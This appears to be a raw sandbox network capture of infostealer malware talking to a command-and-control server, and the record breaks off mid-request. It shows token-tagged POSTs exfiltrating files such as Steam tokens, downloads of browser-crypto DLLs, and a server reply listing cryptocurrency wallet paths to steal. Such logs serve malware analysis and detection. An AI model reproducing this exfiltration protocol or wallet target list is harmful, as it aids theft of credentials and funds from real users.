Sep 27, 2024 04:21:21.706489086 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="file"------GCAKKECAEGDGCBFIJEGH--
Sep 27, 2024 04:21:22.009330034 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:21:23.970422983 CEST	93	OUT	GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 27, 2024 04:21:24.196475029 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 27, 2024 04:21:25.403312922 CEST	93	OUT	GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 27, 2024 04:21:25.629426003 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 27, 2024 04:21:26.216484070 CEST	94	OUT	GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 27, 2024 04:21:26.442964077 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 27, 2024 04:21:26.837861061 CEST	90	OUT	GET /f1ddeb6592c03206/nss3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 27, 2024 04:21:27.063851118 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 27, 2024 04:21:28.640436888 CEST	94	OUT	GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 27, 2024 04:21:28.866633892 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:28 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 27, 2024 04:21:29.369751930 CEST	98	OUT	GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 27, 2024 04:21:29.597242117 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:29 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 27, 2024 04:21:30.769413948 CEST	202	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJE Host: 185.215.113.17 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 04:21:31.250708103 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:21:31.597893953 CEST	468	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG Host: 185.215.113.17 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 2d 2d 0d 0a Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="message"wallets------JKJDBAAAEHIEGCAKFHCG--
Sep 27, 2024 04:21:31.988763094 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:31 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 27, 2024 04:21:31.999931097 CEST	466	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD Host: 185.215.113.17 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="message"files------CGHDAKKJJJKJKECBGCGD--
Sep 27, 2024 04:21:32.228271008 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:21:32.254424095 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file"------AKECBFBAEBKJJJJKFCGC--
Sep 27, 2024 04:21:32.570163965 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:21:32.598932981 CEST	473	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBA Host: 185.215.113.17 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="message"ybncbhylepme------GHJDHDAECBGCAKEBAEBA--
Sep 27, 2024 04:21:32.902636051 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:21:32.920731068 CEST	473	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAK Host: 185.215.113.17 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 